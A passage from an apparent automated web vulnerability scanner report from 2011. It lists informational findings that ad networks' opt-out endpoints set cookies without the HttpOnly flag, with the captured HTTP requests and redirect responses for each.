Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:22 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:54:23 GMT; path=/; domain=.pm14.com
Location: http://optout.mookie1.dtfssearch.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.50. http://optout.mxptint.net/naioptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naioptout.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /naioptout.ashx?nocache=0.2503852 HTTP/1.1
Host: optout.mxptint.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:46 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
P3P: CP="NON CUR ADM DEVo PSAo PSDo OUR IND UNI COM NAV DEM STA PRE"
Location: /naicheck.ashx
Set-Cookie: mxpim=optout; domain=mxptint.net; expires=Mon, 13-Nov-2017 18:53:46 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fnaicheck.ashx">here</a>.</h2>
</body></html>

6.51. http://optout.xgraph.net/optout.gif.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.xgraph.net
Path:   /optout.gif.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.gif.jsp?nocache=0.2939305 HTTP/1.1
Host: optout.xgraph.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XG_OPT_OUT=OPTOUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: image/gif
Date: Sun, 13 Nov 2011 18:53:53 GMT
Location: http://optout.xgraph.net/optout.gif.jsp?check=1
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"
Server: nginx/1.0.4
Set-Cookie: XG_OPT_OUT=OPTOUT; Domain=.xgraph.net; Expires=Sun, 06-Nov-2039 18:53:53 GMT; Path=/
Content-Length: 0
Connection: keep-alive


6.52. http://p.brilig.com/contact/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/optout?nocache=0.5174185 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:25 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: BriligContact=OPT_OUT; Domain=.brilig.com; Expires=Tue, 05-Nov-2041 18:53:25 GMT
Set-Cookie: bbid=""; Domain=.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: bbid=""; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Set-Cookie: BriligContact=OPT_OUT; Domain=p.brilig.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 18:53:25 GMT
Location: http://p.brilig.com/contact/isoptout?type=optout
X-Brilig-D: D=1315
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


6.53. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?optout=$nai_optout$&nocache=0.1675256 HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anProfile=-lwue04+0+s0=(8q)+h=bc+1m=1+rv=(-8)+1j=57:1+rt='32177B6A'+rs=c+1f=d+4=2lx

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app5.ny
Set-Cookie: anProfile=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anHistory=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCSC=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCnv=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anSt=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTRD=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTHS=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTD4=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: optout=0+0+0; Domain=.pro-market.net; Expires=Tue, 05-Nov-2041 18:53:42 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Location: http://pbid.pro-market.net/engine?optout=$nai_verify$
Content-Type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:41 GMT
Connection: close


6.54. http://pixel.adblade.com/optoutnai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.adblade.com
Path:   /optoutnai.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optoutnai.php?action=optout&nocache=0.6375042 HTTP/1.1
Host: pixel.adblade.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: __tuid=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.adblade.com
Set-Cookie: __sgs=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.adblade.com
Set-Cookie: __optout=1; expires=Fri, 11-Nov-2016 18:53:42 GMT; path=/; domain=.adblade.com
Location: /optoutnai.php?action=exists
Content-type: text/html
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:42 GMT
Server: lighttpd/1.4.21


6.55. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/optout?nocache=0.0754388 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1; __utma=92051597.1379704095.1318616383.1318616383.1318616383.1; __utmz=92051597.1318616383.1.1.utmcsr=gsicommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/sitemap.php

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: apd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cmp=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uat=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1321210434_1321210427842:3568653602491747; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: opt=; Domain=.fetchback.com; Expires=Fri, 11-Nov-2016 18:53:54 GMT; Path=/
Set-Cookie: ppd=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1321210434; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 13 Nov 2011 18:53:54 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://pixel.fetchback.com/serve/fb/optoutverification
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: image/gif


6.56. http://privacy.revsci.net/optout/optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optout.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout/optout.aspx?a=1&p=http://www.networkadvertising.org&nocache=0.5921878 HTTP/1.1
Host: privacy.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Set-Cookie: NETID01=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETID01=optout; Domain=.revsci.net; Expires=Thu, 05-Nov-2043 18:53:43 GMT; Path=/
Location: http://privacy.revsci.net/optout/optoutv.aspx?cs=True&v=1&p=http%3A%2F%2Fwww.networkadvertising.org%2F
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:43 GMT


6.57. http://px.owneriq.net/naioptout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /naioptout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /naioptout?nocache=0.6825036 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=optout

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://px.owneriq.net/naioptoutcheck
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sun, 13 Nov 2011 18:53:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Nov 2011 18:53:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ss=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: sg=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: si=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: sgeo=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: oxuuid=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: gguuid=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: abuuid=deleted; expires=Sat, 13-Nov-2010 18:53:54 GMT; path=/; domain=.owneriq.net
Set-Cookie: optout=optout; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.owneriq.net


6.58. http://rp.gwallet.com/r1/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/optout?optout&nocache=0.5156474 HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rp.gwallet.com/r1/optout?check&rand=1321210456912
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 12-Nov-2012 18:54:16 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=OTX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 13-Nov-2016 18:54:16 GMT; Path=/; Domain=gwallet.com; Version=1


6.59. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=11&ti=5&nocache=0.301791 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgbi=1; lgtix=HAA3AGQB/QAGAGsBXwABAGQBcxwBAHcB; lgsp=VWR8KncB

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:50:53 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Set-Cookie: lgtix=BQACAHkBHAA3AGQB/QAGAGsBXwABAGQBcxwBAHcB; path=/; expires=Wed, 12 Nov 2014 18:50:53 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 1
Connection: close
Content-Type: text/html; charset=iso-8859-1


6.60. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coop?action_id=4&version=old&nocache=0.69723 HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 13 Nov 2011 18:53:48 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Set-cookie: X1ID=OO-00000000000000000; domain=.ru4.com; path=/; expires=Sun, 13-Nov-2041 13:53:48 GMT
Location: http://s.xp1.ru4.com/coop?action_id=4&version=old&test_flag=1
Content-length: 0
X-Cnection: close


6.61. http://t5.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t5.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=None&p=http%3A//www.turn.com/&i=17702 HTTP/1.1
Host: t5.trackalyzer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.turn.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response

HTTP/1.1 302 Object moved
Date: Sun, 13 Nov 2011 18:49:50 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Location: http://t5.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eturn%2Ecom%2F; expires=Mon, 14-Nov-2011 08:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t5.trackalyzer.com/dot.gif">here</a>.</body>

6.62. http://tag.admeld.com/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-status

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai-status?nocache=0.8572202 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560; meld_sess=4ec87822-8f33-4202-954a-f6f06a37734b

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 13 Nov 2011 18:51:52 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie
...[SNIP]...

6.63. http://tag.admeld.com/nai-test-opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-test-opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai-test-opt-out HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-273080792-1316409083560; admeld_opt_out=true

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 13 Nov 2011 18:54:03 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_su
...[SNIP]...

6.64. http://www.adbrite.com/mb/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mb/nai_optout.php?nocache=0.4172414 HTTP/1.1
Host: www.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A15hai%2C13lfy%2Cx4co%2C163rx%2C13wid%2C13beg%2C15sx4"

Response

HTTP/1.1 302 Found
Content-Type: text/html
Date: Sun, 13 Nov 2011 18:53:43 GMT
Location: http://www.adbrite.com/mb/nai_optout.php?set=yes
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache
Set-Cookie: ut=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: b=deleted; expires=Sat, 13-Nov-2010 18:53:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: untarget=1; expires=Wed, 10-Nov-2021 18:53:43 GMT; path=/; domain=adbrite.com
Content-Length: 0


6.65. http://www.addthis.com/api/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/nai/optout?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: uid=0000000000000000; expires=Wed, 10-Nov-2021 18:53:42 GMT; path=/; domain=.addthis.com
Set-Cookie: loc=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.addthis.com
Set-Cookie: uvc=deleted; expires=Sat, 13-Nov-2010 18:53:41 GMT; path=/; domain=.addthis.com
Location: /api/nai/optout-verify
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


